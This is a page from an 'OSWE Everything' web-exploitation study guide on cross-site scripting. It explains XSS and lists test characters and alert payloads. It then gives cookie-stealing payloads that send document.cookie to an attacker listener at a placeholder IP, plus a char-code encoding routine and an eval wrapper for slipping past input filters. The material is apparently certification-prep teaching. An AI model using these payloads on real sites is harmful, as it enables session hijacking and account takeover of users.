💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  • What is Cross Site Scripting (XSS)
  • Video explaination
  • How to find it
  • XSS Cookie Stealer
  • Payload encoding
  1. VULNERABILITIES

Cross Site Scripting

PreviousType JugglingNextHunting for files

Last updated 5 months ago

What is Cross Site Scripting (XSS)

Application instead of encoding the input data, treats the input data provided by the user as HTML / JavaScript code which leads to possibility of injecting malicious scripts to the website.

In this way attacker can deliver the script to the victim which when executed can perform any action as targeted user (e.g. steal his session cookie).

Video explaination

How to find it

The most frequently used character to test for XSS injection:

HTML

< > " '

JavaScript

' " { } ;

Default payload

<script>alert(document.domain)</script>

Img payload

<img src onerror=alert(document.domain)>

XSS Cookie Stealer

As mentioned in the previous chapter attacker is able to steal victim's session cookie with Cross Site Scripting (if cookie is not protected with Http Only flag). Below there can be found step by step process how attacker can perform this attack.

Attacker side

python3 -m http.server 8888
<script>window.location.replace("http://IP:8888/a"+document.cookie);</script>
<img src onerror=window.location.replace("http://IP:8888/a"+document.cookie);>

Payload encoding

Sometimes as attackers we have to bypass the input filters which forces us to compress the JavaScript code with JSCompress.

Convert it into CharCode using the following JavaScript code:

function encode_to_javascript(string) {
            var input = string
            var output = '';
            for(pos = 0; pos < input.length; pos++) {
                output += input.charCodeAt(pos);
                if(pos != (input.length - 1)) {
                    output += ",";
                }
            }
            return output;
        }
        
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute the encoded payload:

<script>eval(String.fromCharCode(<OUTPUT_FROM_ENCODING>))</script>

https://jscompress.com